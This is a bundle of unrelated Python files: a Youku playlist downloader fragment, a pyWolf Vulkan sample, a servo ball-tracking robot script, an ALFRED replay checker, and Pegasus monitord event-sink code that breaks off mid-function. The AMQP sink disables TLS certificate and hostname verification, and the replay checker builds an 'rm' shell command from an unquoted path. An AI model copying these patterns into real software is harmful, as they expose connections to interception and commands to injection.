return ['http://v.youku.com/v_playlist/f%so0p%s.html' % (id, i) for i in range(n)]
def youku_download_playlist(url, output_dir='.', merge=True, info_only=False):
"""Downloads a Youku playlist.
"""
if re.match(r'http://www.youku.com/playlist_show/id_\d+(?:_ascending_\d_mode_pic(?:_page_\d+)?)?.html', url):
ids = parse_vplaylist(url)
elif re.match(r'http://v.youku.com/v_playlist/f\d+o[01]p\d+.html', url):
ids = parse_vplaylist(url)
elif re.match(r'http://u.youku.com/user_playlist/pid_(\d+)_id_[\w=]+(?:_page_\d+)?.html', url):
ids = parse_vplaylist(url)
elif re.match(r'http://www.youku.com/show_page/id_\w+.html', url):
url = find_video_id_from_show_page(url)
assert re.match(r'http://v.youku.com/v_show/id_([\w=]+).html', url), 'URL not supported as playlist'
ids = parse_playlist(url)
else:
ids = []
assert ids != []
title = parse_playlist_title(url, get_html(url))
title = filenameable(title)
output_dir = os.path.join(output_dir, title)
for i, id in enumerate(ids):
print('Processing %s of %s videos...' % (i + 1, len(ids)))
try:
id, title = parse_page(youku_url(id))
youku_download_by_id(id, title, output_dir=output_dir, merge=merge, info_only=info_only)
except Exception:
continue
def youku_download(url, output_dir='.', merge=True, info_only=False):
"""Downloads Youku videos by URL.
"""
try:
youku_download_playlist(url, output_dir=output_dir, merge=merge, info_only=info_only)
except Exception:
id, title = parse_page(url)
youku_download_by_id(id, title=title, output_dir=output_dir, merge=merge, info_only=info_only)
site_info = "Youku.com"
download = youku_download
download_playlist = youku_download_playlist
|
01_clear.py
|
import sys, os
#get path of script
_script_path = os.path.realpath(__file__)
pyWolfPath = os.path.dirname(_script_path)
if sys.platform == "linux" or sys.platform == "linux2":
print "Linux not tested yet"
elif sys.platform == "darwin":
print "OS X not tested yet"
elif sys.platform == "win32":
pyWolfPath = pyWolfPath + "\\..\\..\\..\\..\\bin\\x64\\Debug\\Win32\\"
if pyWolfPath != "" and (not pyWolfPath in sys.path):
sys.path.append(pyWolfPath)
import ctypes, threading, pyWolf
from PySide import QtGui, QtCore
from PySide.QtGui import *
from PySide.QtCore import *
screen_width = 800
screen_height = 600
class scene(QWidget):
def __init__(self, pContentPath, pLogPath, pAppName, parent = None):
super(scene, self).__init__(parent)
self.__exiting = False
self._game = pyWolf.framework.w_game(pContentPath, pLogPath, pAppName)
self._game.set_pre_init_callback(self.pre_init)
self._game.set_post_init_callback(self.post_init)
self._game.set_load_callback(self.load)
self._game.set_update_callback(self.update)
self._game.set_pre_render_callback(self.pre_render)
self._game.set_post_render_callback(self.post_render)
self._gDevice = None
self._viewport = pyWolf.graphics.w_viewport()
self._viewport_scissor = pyWolf.graphics.w_viewport_scissor()
self._draw_command_buffers = pyWolf.graphics.w_command_buffers()
self._draw_render_pass = pyWolf.graphics.w_render_pass()
self._draw_fence = pyWolf.graphics.w_fences()
self._draw_semaphore = pyWolf.graphics.w_semaphore()
def pre_init(self):
print "pre_init"
def post_init(self):
#get main graphics device
self._gDevice = self._game.get_graphics_device(0)
print self._gDevice.get_info()
print "post_init"
def load(self):
#initialize viewport
self._viewport.y = 0
self._viewport.width = screen_width
self._viewport.height = screen_height
self._viewport.minDepth = 0
self._viewport.maxDepth = 1
#initialize scissor of viewport
self._viewport_scissor.offset.x = 0
self._viewport_scissor.offset.y = 0
self._viewport_scissor.extent.width = screen_width
self._viewport_scissor.extent.height = screen_height
#load render pass which contains frame buffers
_render_pass_attachments = []
_output_window = self._gDevice.output_presentation_window
for _iter in _output_window.swap_chain_image_views:
# COLOR #DEPTH
_render_pass_attachments.append([_iter, _output_window.depth_buffer_image_view])
_hr = self._draw_render_pass.load(self._gDevice, self._viewport, self._viewport_scissor, _render_pass_attachments)
if _hr:
print "Error on loading render pass"
return
#create one semaphore for drawing
_hr = self._draw_semaphore.initialize(self._gDevice)
if _hr:
print "Error on initializing semaphore"
return
#create one fence for drawing
_hr = self._draw_fence.initialize(self._gDevice)
if _hr:
print "Error on initializing fence(s)"
return
#create command buffer(s) for drawing
number_of_swap_chains = self._gDevice.get_number_of_swap_chains()
_hr = self._draw_command_buffers.load(self._gDevice, number_of_swap_chains, pyWolf.graphics.w_command_buffer_level.PRIMARY)
if _hr:
print "Error on initializing draw command buffer(s)"
return
_hr = self.build_command_buffers()
if _hr:
print "Error on building draw command buffer(s)"
return
print "scene loaded successfully"
def build_command_buffers(self):
_hr = pyWolf.W_PASSED
_size = self._draw_command_buffers.get_commands_size()
for i in xrange(_size):
_cmd = self._draw_command_buffers.get_command_at(i)
_hr = self._draw_command_buffers.begin(i, pyWolf.graphics.w_command_buffer_usage_flag_bits.SIMULTANEOUS_USE_BIT)
if _hr:
print "Error on begining command buffer: " + str(i)
break
self._draw_render_pass.begin(i, _cmd, pyWolf.system.w_color.CORNFLOWER_BLUE(), 1.0, 0)
#place your draw code
self._draw_render_pass.end(_cmd)
_hr = self._draw_command_buffers.end(i)
if _hr:
print "Error on ending command buffer: " + str(i)
break
return _hr
def update(self, pGameTime):
print "fps: " + str(pGameTime.get_frames_per_second())
def pre_render(self, pGameTime):
_output_window = self._gDevice.output_presentation_window
_frame_index = _output_window.swap_chain_image_index
_wait_dst_stage_mask = [ pyWolf.graphics.w_pipeline_stage_flag_bits.COLOR_ATTACHMENT_OUTPUT_BIT ]
_wait_semaphores = [ _output_window.swap_chain_image_is_available_semaphore ]
_signal_semaphores = [ _output_window.rendering_done_semaphore ]
_cmd = self._draw_command_buffers.get_command_at(_frame_index)
_cmd_buffers = [_cmd ]
#reset draw fence
self._draw_fence.reset()
_hr = self._gDevice.submit(_cmd_buffers, self._gDevice.graphics_queue, _wait_dst_stage_mask, _wait_semaphores, _signal_semaphores, self._draw_fence)
if _hr:
print "Error on submit to graphics device"
return
_hr = self._draw_fence.wait()
if _hr:
print "Error on waiting for draw fence"
return
def post_render(self, pSuccessfullyRendered):
if pSuccessfullyRendered == False:
print "Rendered Unsuccessfully"
def run(self):
#run game
_window_info = pyWolf.system.w_window_info()
_window_info.width = self.width()
_window_info.height = self.height()
_window_info.v_sync_enable = False
_window_info.is_full_screen = False
_window_info.swap_chain_format = 44 # BGRA8Unorm in VULKAN
_window_info.cpu_access_swap_chain_buffer = False
# get window handle
pycobject_hwnd = self.winId()
#convert window handle as HWND to unsigned integer pointer for c++
ctypes.pythonapi.PyCObject_AsVoidPtr.restype = ctypes.c_void_p
ctypes.pythonapi.PyCObject_AsVoidPtr.argtypes = [ctypes.py_object]
int_hwnd = ctypes.pythonapi.PyCObject_AsVoidPtr(pycobject_hwnd)
_window_info.set_win_id(int_hwnd)
#initialize game
_map_info = (0, _window_info)
while True:
if self.__exiting:
self.release()
break
self._game.run(_map_info)
print "Game exited"
def showEvent(self, event):
#run in another thread
threading.Thread(target=self.run).start()
event.accept()
def closeEvent(self, event):
self.__exiting = True
event.accept()
def release(self):
self._draw_fence.release()
self._draw_fence = None
self._draw_semaphore.release()
self._draw_semaphore = None
self._draw_command_buffers.release()
self._draw_command_buffers = None
self._draw_render_pass.release()
self._draw_render_pass = None
self._game.release()
self._game = None
self._gDevice = None
self._viewport = None
self._viewport_scissor = None
if __name__ == '__main__':
# Create a Qt application
app = QApplication(sys.argv)
scene = scene(pyWolfPath + "..\\..\\..\\..\\content\\",
pyWolfPath,
"py_01_clear")
scene.resize(screen_width, screen_height)
scene.setWindowTitle('Wolf.Engine')
scene.show()
sys.exit(app.exec_())
|
11.robot_servo_ball.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
* @par Copyright (C): 2010-2020, Hunan CLB Tech
* @file robot_servo_ball
* @version V1.0
* @details
* @par History
@author: zhulin
"""
from __future__ import division
import cv2
import time
import numpy as np
import Adafruit_PCA9685
import threading
# Initialize the PCA9685 and the servos
servo_pwm = Adafruit_PCA9685.PCA9685() # instantiate the servo gimbal driver
# Set the servos' initial values; tune these to your own hardware
servo_pwm.set_pwm_freq(60) # set PWM frequency to 60 Hz
servo_pwm.set_pwm(5,0,350) # base (pan) servo
servo_pwm.set_pwm(4,0,370) # tilt servo
time.sleep(1)
# Initialize the camera and set the tracking thresholds
usb_cap = cv2.VideoCapture(0)
# HSV lower/upper bounds for tracking the yellow ball
ball_yellow_lower=np.array([9,135,231])
ball_yellow_upper=np.array([31,255,255])
# Set the capture resolution to 320x240 px
usb_cap.set(3, 320)
usb_cap.set(4, 240)
# Each gimbal axis needs four PID variables
pid_thisError_x=500 # current error
pid_lastError_x=100 # previous error
pid_thisError_y=500
pid_lastError_y=100
pid_x=0
pid_y=0
# Servo rotation angles
pid_Y_P = 280
pid_X_P = 300 # rotation angle
pid_flag=0
# Rotate the robot servos
def Robot_servo(X_P,Y_P):
servo_pwm.set_pwm(5,0,650-X_P)
servo_pwm.set_pwm(4,0,650-Y_P)
# Main loop
while True:
ret,frame = usb_cap.read()
# Gaussian blur
frame=cv2.GaussianBlur(frame,(5,5),0)
hsv= cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)
# ROI / morphological processing to locate the ball
mask=cv2.inRange(hsv,ball_yellow_lower,ball_yellow_upper) # mask to the HSV range
mask=cv2.erode(mask,None,iterations=2)
mask=cv2.dilate(mask,None,iterations=2)
mask=cv2.GaussianBlur(mask,(3,3),0)
res=cv2.bitwise_and(frame,frame,mask=mask)
cnts=cv2.findContours(mask.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[-2] # find the ball contours
# When the ball is found
if len(cnts)>0:
cap_cnt=max(cnts,key=cv2.contourArea)
(pid_x,pid_y),radius=cv2.minEnclosingCircle(cap_cnt)
cv2.circle(frame,(int(pid_x),int(pid_y)),int(radius),(255,0,255),2)
# Pixel error from the image center (160, 120)
pid_thisError_x=pid_x-160
pid_thisError_y=pid_y-120
# PD control terms (P gain 3, D gain 1)
pwm_x = pid_thisError_x*3+1*(pid_thisError_x-pid_lastError_x)
pwm_y = pid_thisError_y*3+1*(pid_thisError_y-pid_lastError_y)
# Carry the errors over to the next iteration
pid_lastError_x = pid_thisError_x
pid_lastError_y = pid_thisError_y
pid_XP=pwm_x/100
pid_YP=pwm_y/100
# pid_X_P / pid_Y_P are the final servo setpoints
pid_X_P=pid_X_P-int(pid_XP)
pid_Y_P=pid_Y_P-int(pid_YP)
# Clamp the servo setpoints to a safe range
if pid_X_P>670:
pid_X_P=650
if pid_X_P<0:
pid_X_P=0
if pid_Y_P>650:
pid_Y_P=650
if pid_Y_P<0:
pid_Y_P=0
servo_tid=threading.Thread(target=Robot_servo,args=(pid_X_P,pid_Y_P)) # update servos in a worker thread
servo_tid.setDaemon(True)
servo_tid.start() # start the thread
cv2.imshow("MAKEROBO Robot", frame) # show the frame
if cv2.waitKey(1)==119:
break
usb_cap.release()
cv2.destroyAllWindows()
|
replay_checks.py
|
import os
import sys
# sys.path.append(os.path.join(os.environ['ALFRED_ROOT']))
# sys.path.append(os.path.join(os.environ['ALFRED_ROOT'], 'gen'))
sys.path.append(os.path.join('/home/jiasenl/code/alfred'))
sys.path.append(os.path.join('/home/jiasenl/code/alfred', 'gen'))
import argparse
import json
import numpy as np
import shutil
import time
from env.thor_env import ThorEnv
from utils.replay_json import replay_json
import multiprocessing as mp
JSON_FILENAME = "traj_data.json"
def parallel_replay_check(args):
procs = [mp.Process(target=replay_check, args=(args, thread_num)) for thread_num in range(args.num_threads)]
try:
for proc in procs:
proc.start()
time.sleep(0.1)
finally:
for proc in procs:
proc.join()
def replay_check(args, thread_num=0):
env = ThorEnv(x_display='0.%d' %(thread_num % args.total_gpu))
# replay certificate filenames
replay_certificate_filenames = ["replay.certificate.%d" % idx for idx in range(args.num_replays)]
# Clear existing failures in file recording.
if args.failure_filename is not None:
with open(args.failure_filename, 'w') as f:
f.write('')
continue_check = True
total_checks, total_failures, crash_fails, unsat_fails, json_fails, nondet_fails = 0, 0, 0, 0, 0, 0
errors = {} # map from error strings to counts, to be shown after every failure.
total_threads = args.total_gpu * args.num_threads
current_threads = args.gpu_id * args.num_threads + thread_num
while continue_check:
# Crawl the directory of trajectories and vet ones with no certificate.
failure_list = []
valid_dirs = []
count = 0
for dir_name, subdir_list, file_list in os.walk(args.data_path):
if "trial_" in dir_name and (not "raw_images" in dir_name) and (not "pddl_states" in dir_name):
json_file = os.path.join(dir_name, JSON_FILENAME)
if not os.path.isfile(json_file):
continue
# If we're just stripping certificates, do that and continue.
if args.remove_certificates:
for cidx in range(args.num_replays):
certificate_file = os.path.join(dir_name, replay_certificate_filenames[cidx])
if os.path.isfile(certificate_file):
os.system("rm %s" % certificate_file)
continue
if count % total_threads == current_threads:
valid_dirs.append(dir_name)
count += 1
print(len(valid_dirs))
np.random.shuffle(valid_dirs)
for ii, dir_name in enumerate(valid_dirs):
if not os.path.exists(dir_name):
continue
json_file = os.path.join(dir_name, JSON_FILENAME)
if not os.path.isfile(json_file):
continue
cidx = 0
certificate_file = os.path.join(dir_name, replay_certificate_filenames[cidx])
already_checked = False
while os.path.isfile(certificate_file):
cidx += 1
if cidx == args.num_replays:
already_checked = True
break
certificate_file = os.path.join(dir_name, replay_certificate_filenames[cidx])
if already_checked:
continue
print(ii)
if not os.path.isfile(certificate_file):
total_checks += 1. / args.num_replays
failed = False
with open(json_file) as f:
print("check %d/%d for file '%s'" % (cidx + 1, args.num_replays, json_file))
try:
traj_data = json.load(f)
env.set_task(traj_data, args, reward_type='dense')
except json.decoder.JSONDecodeError:
failed = True
json_fails += 1
if not failed:
steps_taken = None
try:
steps_taken = replay_json(env, json_file)
except Exception as e:
import traceback
traceback.print_exc()
failed = True
crash_fails += 1
if str(e) not in errors:
errors[str(e)] = 0
errors[str(e)] += 1
print("%%%%%%%%%%")
es = sum([errors[er] for er in errors])
print("\terrors (%d):" % es)
for er, v in sorted(errors.items(), key=lambda kv: kv[1], reverse=True):
# if v / es < 0.01: # stop showing below 1% of errors.
# break
print("\t(%.2f) (%d)\t%s" % (v / es, v, er))
print("%%%%%%%%%%")
if cidx > 1:
print("WARNING: replay that has succeeded before has failed at attempt %d"
% cidx)
nondet_fails += 1
if steps_taken is not None: # executed without crashing, so now we need to verify completion.
goal_satisfied = env.get_goal_satisfied()
if goal_satisfied:
with open(certificate_file, 'w') as f:
f.write('%d' % steps_taken)
else:
failed = True
unsat_fails += 1
print("Goal was not satisfied after execution!")
if failed:
# Mark one failure and count the remainder of checks for this instance into the total.
total_failures += 1
total_checks += args.num_replays - ((cidx + 1) / float(args.num_replays))
failure_list.append(json_file)
if args.failure_filename is not None:
with open(args.failure_filename, 'a') as f:
f.write("%s\n" % json_file)
# If we're deleting bad trajectories, do that here.
if args.move_failed_trajectories is not None:
print("Relocating failed trajectory '%s' to '%s'" %
(dir_name, os.path.join(args.move_failed_trajectories)))
try:
shutil.move(dir_name, args.move_failed_trajectories)
except shutil.Error as e:
print("WARNING: failed to perform move; error follows; deleting instead")
print(repr(e))
shutil.rmtree(dir_name)
if args.remove_failed_trajectories:
print("Removing failed trajectory '%s'" % dir_name)
shutil.rmtree(dir_name)
print("-------------------------")
print("Success Rate: %.2f/%.2f = %.3f" %
(total_checks - total_failures, total_checks,
float(total_checks - total_failures) / float(total_checks)))
if total_failures > 0:
print("Non-deterministic failure: %d/%d = %.3f" % (nondet_fails, total_failures,
float(nondet_fails) / total_failures))
print("Failures by crash: %d/%d = %.3f" % (crash_fails, total_failures,
float(crash_fails) / total_failures))
print("Failures by unsatisfied: %d/%d = %.3f" % (unsat_fails, total_failures,
float(unsat_fails) / total_failures))
print("Failures by json decode error: %d/%d = %.3f" % (json_fails, total_failures,
float(json_fails) / total_failures))
print("-------------------------")
if not args.in_parallel:
continue_check = False
else:
time.sleep(60)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--data_path', type=str, default="dataset/2.1.0",
help="where to look for the generated data")
parser.add_argument("--failure_filename", type=str, required=False,
help="where to write failed trajectory dirs as strings, if anywhere")
parser.add_argument("--remove_failed_trajectories", dest='remove_failed_trajectories', action='store_true',
help="delete trajectory trials if they fail replay")
parser.add_argument("--move_failed_trajectories", type=str, required=False,
help="if given, relocate failed trajectories to this directory")
parser.add_argument("--remove_certificates", dest='remove_certificates', action='store_true',
help="instead of vetting trajectories, remove all vetting certificates")
parser.add_argument("--in_parallel", dest='in_parallel', action='store_true',
help="whether to run this script with parallel generation scripts in mind")
parser.add_argument('--reward_config', default='../models/config/rewards.json')
parser.add_argument('--num_replays', type=int, default=1)
parser.add_argument('--gpu_id', type=int, default=0)
parser.add_argument('--total_gpu', type=int, default=2)
parser.add_argument('--num_threads', type=int, default=2)
args = parser.parse_args()
if args.num_threads > 1:
parallel_replay_check(args)
else:
replay_check(args)
|
event_output.py
|
"""
Functions for output pegasus-monitord events to various destinations.
"""
##
# Copyright 2007-2011 University Of Southern California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
import logging
import queue
import re
import socket
import ssl
import time
import traceback
import urllib.parse
from threading import Thread
from pegaflow import json
from pegaflow.db import connection, expunge
from pegaflow.db.dashboard_loader import DashboardLoader
from pegaflow.db.workflow_loader import WorkflowLoader
from pegaflow.netlogger import nlapi
from pegaflow.tools import properties, utils
log = logging.getLogger(__name__)
# Optional imports, only generate 'warnings' if they fail
bson = None
try:
import bson
except Exception:
log.info("cannot import BSON library, 'bson'")
amqp = None
try:
import pika as amqp
except Exception:
log.info("cannot import AMQP library")
# Event name-spaces
STAMPEDE_NS = "stampede."
DASHBOARD_NS = "dashboard."
def purge_wf_uuid_from_database(rundir, output_db):
"""
This function purges a workflow id from the output database.
"""
# PM-652 do nothing for sqlite
# DB is already rotated in pegasus-monitord
if output_db.lower().startswith("sqlite"):
return
# Parse the braindump file
wfparams = utils.slurp_braindb(rundir)
wf_uuid = wfparams.get("wf_uuid", None)
if wf_uuid is None:
return
expunge.delete_workflow(output_db, wf_uuid)
def purge_wf_uuid_from_dashboard_database(rundir, output_db):
"""
This function purges a workflow id from the output dashboard database.
"""
# Parse the braindump file
wfparams = utils.slurp_braindb(rundir)
wf_uuid = wfparams.get("wf_uuid", None)
if wf_uuid is None:
return
expunge.delete_dashboard_workflow(output_db, wf_uuid)
class OutputURL:
"""
Break output URL into named parts for easier handling.
"""
def __init__(self, url):
(
self.scheme,
self.netloc,
self.path,
self.params,
query,
frag,
) = urllib.parse.urlparse(url)
host_port = ""
user_pass = ""
if "@" in self.netloc:
user_pass, host_port = self.netloc.split("@", 1)
else:
host_port = self.netloc
if ":" in host_port:
self.host, portstr = host_port.split(":", 1)
self.port = int(portstr)
        else:
            self.host = host_port
            self.port = None
        # default the credentials so attribute access is always safe
        self.user = None
        self.password = None
        if ":" in user_pass:
            self.user, self.password = user_pass.split(":", 1)
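# Hedged usage sketch (not part of the original module; the broker host and
# credentials below are made up for illustration).
def _output_url_example():
    url = OutputURL("amqp://guest:guest@broker.example.org:5671/pegasus/monitord")
    assert url.scheme == "amqp" and url.host == "broker.example.org"
    assert url.port == 5671 and url.user == "guest"
    assert url.path == "/pegasus/monitord"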
class EventSink:
"""
Base class for an Event Sink.
"""
def __init__(self):
self._log = logging.getLogger(
"{}.{}".format(self.__module__, self.__class__.__name__)
)
        # Accepted events; keep this listing consistent with the dict in the workflow loader
self._acceptedEvents = (
"stampede.wf.plan",
"stampede.wf.map.task_job",
"stampede.static.start",
"stampede.static.end",
"stampede.xwf.start",
"stampede.xwf.end",
"stampede.xwf.map.subwf_job",
"stampede.task.info",
"stampede.task.edge",
"stampede.job.info",
"stampede.job.edge",
"stampede.job_inst.pre.start",
"stampede.job_inst.pre.term",
"stampede.job_inst.pre.end",
"stampede.job_inst.submit.start",
"stampede.job_inst.submit.end",
"stampede.job_inst.held.start",
"stampede.job_inst.held.end",
"stampede.job_inst.main.start",
"stampede.job_inst.main.term",
"stampede.job_inst.main.end",
"stampede.job_inst.post.start",
"stampede.job_inst.post.term",
"stampede.job_inst.post.end",
"stampede.job_inst.host.info",
"stampede.job_inst.image.info",
"stampede.job_inst.abort.info",
"stampede.job_inst.grid.submit.start",
"stampede.job_inst.grid.submit.end",
"stampede.job_inst.globus.submit.start",
"stampede.job_inst.globus.submit.end",
"stampede.job_inst.tag",
"stampede.job_inst.composite",
"stampede.inv.start",
"stampede.inv.end",
"stampede.static.meta.start",
"stampede.xwf.meta",
"stampede.task.meta",
"stampede.rc.meta",
"stampede.int.metric",
"stampede.rc.pfn",
"stampede.wf.map.file",
"stampede.static.meta.end",
"stampede.task.monitoring",
)
def send(self, event, kw):
"""
Clients call this function to send an event to the sink.
"""
def close(self):
"""
Clients call this function to close the output to this sink.
"""
def flush(self):
"Clients call this to flush events to the sink"
class DBEventSink(EventSink):
"""
Write wflow event logs to database via loader
"""
def __init__(
self,
dest,
db_stats=False,
namespace=STAMPEDE_NS,
props=None,
db_type=None,
backup=False,
**kw
):
self._namespace = namespace
# pick the right database loader based on prefix
if namespace == STAMPEDE_NS:
self._db = WorkflowLoader(
dest,
perf=db_stats,
batch=True,
props=props,
db_type=db_type,
backup=backup,
)
elif namespace == DASHBOARD_NS:
self._db = DashboardLoader(
dest,
perf=db_stats,
batch=True,
props=props,
db_type=db_type,
backup=backup,
)
else:
raise ValueError("Unknown namespace specified '%s'" % (namespace))
super().__init__()
def send(self, event, kw):
self._log.trace("send.start event=%s", event)
d = {"event": self._namespace + event}
for k, v in kw.items():
d[k.replace("__", ".")] = v
self._db.process(d)
self._log.trace("send.end event=%s", event)
def close(self):
self._log.trace("close.start")
self._db.finish()
self._log.trace("close.end")
def flush(self):
self._db.flush()
class FileEventSink(EventSink):
"""
Write wflow event logs to a file.
"""
def __init__(self, path, restart=False, encoder=None, **kw):
super().__init__()
if restart:
self._output = open(path, "w", 1)
else:
self._output = open(path, "a", 1)
self._encoder = encoder
def send(self, event, kw):
self._log.trace("send.start event=%s", event)
self._output.write(self._encoder(event=event, **kw))
if self._encoder == json_encode:
self._output.write("\n")
self._log.trace("send.end event=%s", event)
def close(self):
self._log.trace("close.start")
self._output.close()
self._log.trace("close.end")
class TCPEventSink(EventSink):
"""
Write wflow event logs to a host:port.
"""
def __init__(self, host, port, encoder=None, **kw):
super().__init__()
self._encoder = encoder
self._sock = socket.socket()
self._sock.connect((host, port))
def send(self, event, kw):
self._log.trace("send.start event=%s", event)
self._sock.send(self._encoder(event=event, **kw))
self._log.trace("send.end event=%s", event)
def close(self):
self._log.trace("close.start")
self._sock.close()
self._log.trace("close.end")
class AMQPEventSink(EventSink):
"""
Write wflow event logs to an AMQP server.
"""
EXCH_OPTS = {"exchange_type": "topic", "durable": True, "auto_delete": False}
DEFAULT_AMQP_VIRTUAL_HOST = "pegasus" # should be /
def __init__(
self,
host,
port,
exch=None,
encoder=None,
userid="guest",
password="guest",
virtual_host=DEFAULT_AMQP_VIRTUAL_HOST,
ssl_enabled=False,
props=None,
connect_timeout=None,
**kw
):
super().__init__()
self._log.info("Encoder used {} Properties received {}".format(encoder, props))
self._encoder = encoder
self._handled_events = set()
self._handle_all_events = False
self.configure_filters(props.property("events"))
self._msg_queue = queue.Queue()
self._stopping = False
self._exch = exch
if connect_timeout is None:
# pick timeout from properties
connect_timeout = props.property("timeout")
if connect_timeout:
connect_timeout = float(connect_timeout)
        # insecure SSL: skip hostname check and certificate verification
SSLOptions = None
if ssl_enabled:
context = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
SSLOptions = amqp.SSLOptions(context)
creds = amqp.PlainCredentials(userid, password)
self._params = amqp.ConnectionParameters(
host=host,
port=port,
ssl_options=SSLOptions,
virtual_host=virtual_host,
credentials=creds,
blocked_connection_timeout=connect_timeout,
heartbeat=None,
) # None -> negotiate heartbeat with the AMQP server
        # create the worker thread as a daemon and start it
self._worker_thread = Thread(target=self.event_publisher, daemon=True)
self._worker_thread.start()
def event_publisher(self):
full_event, event, data = (None, None, None)
reconnect_attempts = 0
while not self._stopping:
try:
self._log.info(
"Connecting to host: %s:%s virtual host: %s exchange: %s with user: %s ssl: %s"
% (
self._params.host,
self._params.port,
self._params.virtual_host,
self._exch,
self._params.credentials.username,
                        self._params.ssl_options is not None,
)
)
self._conn = amqp.BlockingConnection(self._params)
self._channel = self._conn.channel()
self._channel.exchange_declare(self._exch, **self.EXCH_OPTS)
reconnect_attempts = 0
while not self._stopping:
try:
                        # only fetch a new event once the previous one has been
                        # sent; otherwise retry sending the event we already hold
if (full_event is None) and (event is None) and (data is None):
full_event, event, data = self._msg_queue.get(timeout=5)
self._log.trace("send.start event=%s", full_event)
self._channel.basic_publish(
body=data, exchange=self._exch, routing_key=full_event
)
self._log.trace("send.end event=%s", event)
# reset vars
full_event, event, data = (None, None, None)
# mark item as processed
self._msg_queue.task_done()
except queue.Empty:
self._conn.process_data_events() # keep up with the AMQP heartbeats
continue
# Do not recover if connection was closed by broker
except amqp.exceptions.ConnectionClosedByBroker as err:
self._log.error(
"Connection to %s:%s was closed by Broker - Not Recovering"
% (self._params.host, self._params.port)
)
self._log.error("Broker closed connection with: %s, stopping..." % err)
self._conn = None
break
# Do not recover on channel errors
except amqp.exceptions.AMQPChannelError as err:
self._log.error(
"Channel error at %s:%s - Not Recovering"
% (self._params.host, self._params.port)
)
self._log.error("Channel error: %s, stopping..." % err)
self._conn = None
break
# Recover on all other connection errors if reconnect attempts is less than 5
except amqp.exceptions.AMQPConnectionError:
reconnect_attempts += 1
if reconnect_attempts > 5:
self._log.info(
"Connection to %s:%s was closed - Not Recovering"
% (self._params.host, self._params.port)
)
break
else:
self._log.info(
"Connection to %s:%s was closed - Will try to recover the connection"
% (self._params.host, self._params.port)
)
time.sleep((2 ** reconnect_attempts) * 10)
continue
        if self._conn is not None:
self._log.trace("connection - close.start")
self._conn.close()
self._log.trace("connection - close.end")
def configure_filters(self, events):
event_regexes = set()
if events is None:
# add pre-configured specific events
event_regexes.add(re.compile(STAMPEDE_NS + "job_inst.tag"))
event_regexes.add(re.compile(STAMPEDE_NS + "job_inst.composite"))
event_regexes.add(re.compile(STAMPEDE_NS + "inv.end"))
event_regexes.add(re.compile(STAMPEDE_NS + "wf.plan"))
else:
for exp in events.split(","):
if exp == "*":
# short circuit
self._handle_all_events = True
self._log.debug("Events Handled: All")
return
else:
event_regexes.add(re.compile(exp))
# go through each regex and match against accepted events once
for regex in event_regexes:
# go through each list of accepted events to check match
for event in self._acceptedEvents:
if regex.search(event) is not None:
self._handled_events.add(event)
self._log.debug("Events Handled: %s", self._handled_events)
def send(self, event, kw):
if not self._worker_thread.is_alive():
raise Exception("AMQP publisher thread is dead. Cannot send amqp events.")
full_event = STAMPEDE_NS + event
if self.ignore(full_event):
return
data = self._encoder(event=event, **kw)
self._msg_queue.put((full_event, event, data))
def ignore(self, event):
if self._handle_all_events:
# we want all events
return False
return event not in self._handled_events
def close(self):
if self._worker_thread.is_alive():
self._log.trace("Waiting for queue to emtpy.")
self._msg_queue.join() # wait for queue to empty if worker is alive
self._stopping = True
self._log.trace("Waiting for publisher thread to exit.")
self._worker_thread.join()
self._log.trace("Publisher thread exited.")
class MultiplexEventSink(EventSink):
"""
Sends events to multiple end points
"""
def __init__(self, dest, enc, prefix=STAMPEDE_NS, props=None, **kw):
super().__init__()
self._endpoints = {}
self._log.info("Multiplexed Event Sink Connection Properties %s", props)
for key in props.keyset():
if key.endswith(".url"):
sink_name = key[0 : key.rfind(".url")]
                # remove the sink_name-prefixed properties from our copy, if they exist
endpoint_props = properties.Properties(
props.propertyset(sink_name + ".", remove=True)
)
try:
self._endpoints[sink_name] = create_wf_event_sink(
props.property(key),
db_type=connection.DBType.WORKFLOW,
enc=enc,
prefix=prefix,
props=endpoint_props,
multiplexed=True,
**kw,
)
except Exception:
self._log.error(
"[multiplex event sender] Unable to connect to endpoint %s with props %s . Disabling"
% (sink_name, endpoint_props)
)
self._log.error(traceback.format_exc())
def send(self, event, kw):
remove_endpoints = []
for key in self._endpoints:
sink = self._endpoints[key]
try:
sink.send(event, kw)
except Exception:
self._log.error(traceback.format_exc())
self._log.error(
"[multiplex event sender] error sending event. Disabling endpoint %s"
% key
)
self.close_sink(sink)
remove_endpoints.append(key)
# remove endpoints that are disabled
for key in remove_endpoints:
del self._endpoints[key]
def close(self):
for key in self._endpoints:
self._log.debug("[multiplex event sender] Closing endpoint %s" % key)
self.close_sink(self._endpoints[key])
def close_sink(self, sink):
try:
sink.close()
except Exception:
pass
def flush(self):
"Clients call this to flush events to the sink"
for key in self._endpoints:
self._log.debug("[multiplex event sender] Flushing endpoint %s" % key)
self._endpoints[key].flush()
def bson_encode(event, **kw):
"""
Adapt bson.dumps() to NetLogger's Log.write() signature.
"""
kw["event"] = STAMPEDE_NS + event
return bson.dumps(kw)
def json_encode(event, **kw):
"""
Adapt bson.dumps() to NetLogger's Log.write() signature.
"""
kw["event"] = STAMPEDE_NS + event
# PM-1355 , PM-1365 replace all __ and . with _
for k, v in list(kw.items()):
new_key = k.replace(".", "_")
new_key = new_key.replace("__", "_")
kw[new_key] = kw.pop(k)
return json.dumps(kw)
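# Hedged sketch (added for illustration): assumes the pegaflow json wrapper
# mirrors the stdlib json.dumps() output format.
def _json_encode_example():
    s = json_encode("inv.end", job__id=3)
    # the double-underscore key is flattened and the namespace is prefixed
    assert '"job_id"' in s and '"stampede.inv.end"' in s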
def create_wf_event_sink(
dest, db_type, enc=None, prefix=STAMPEDE_NS, props=None, multiplexed=False, **kw
):
"""
Create & return subclass of EventSink, chosen by value of 'dest'
and parameterized by values (if any) in 'kw'.
"""
